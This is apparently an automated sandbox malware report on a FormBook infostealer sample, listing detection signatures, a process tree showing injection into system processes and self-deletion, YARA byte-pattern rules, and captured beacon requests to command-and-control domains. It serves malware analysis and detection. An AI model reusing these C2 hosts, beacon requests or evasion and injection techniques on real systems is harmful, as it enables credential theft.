Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report inv.exe

Overview

General Information

Sample Name:inv.exe
Analysis ID:323024
MD5:55f30220e8a613753f178fb901e5e5a6
SHA1:967f28afe30615264a38dd1ca7b6c818438c180f
SHA256:d8bd3b0fca3a390368fca5b01235e11176b46216b220b79c5548cf63979598c9

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • inv.exe (PID: 5764 cmdline: 'C:\Users\user\Desktop\inv.exe' MD5: 55F30220E8A613753F178FB901E5E5A6)
    • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • inv.exe (PID: 4512 cmdline: C:\Users\user\Desktop\inv.exe MD5: 55F30220E8A613753F178FB901E5E5A6)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 6336 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6716 cmdline: /c del 'C:\Users\user\Desktop\inv.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.inv.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.inv.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.inv.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        0.2.inv.exe.970000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.inv.exe.970000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x51cf0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x51f6a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x5da8d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x5d579:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x5db8f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x5dd07:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x52982:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x5c7f4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x5367b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x638ff:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x64902:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: inv.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: inv.exeVirustotal: Detection: 42%Perma Link
          Source: inv.exeReversingLabs: Detection: 67%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: inv.exeJoe Sandbox ML: detected
          Source: 2.2.inv.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009929D4 FindFirstFileExW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009929D4 FindFirstFileExW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\inv.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\inv.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\inv.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\inv.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49756
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49759
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.7:49761
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49762
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49770
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49772
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49778
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49780
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w== HTTP/1.1Host: www.bitcoincandy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nairobi-paris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1Host: www.multitask-improvements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1Host: www.affiliateclubindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.chartershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.cfmfair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.skinnerttc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 81.88.57.68 81.88.57.68
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
          Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w== HTTP/1.1Host: www.bitcoincandy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nairobi-paris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1Host: www.multitask-improvements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1Host: www.affiliateclubindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.chartershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.cfmfair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.skinnerttc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Nov 2020 07:25:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6b 6f 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hko6/ was not found on this server.</p></body></html>
          Source: systray.exe, 00000005.00000002.1317017162.00000000051FF000.00000004.00000001.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.260102956.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
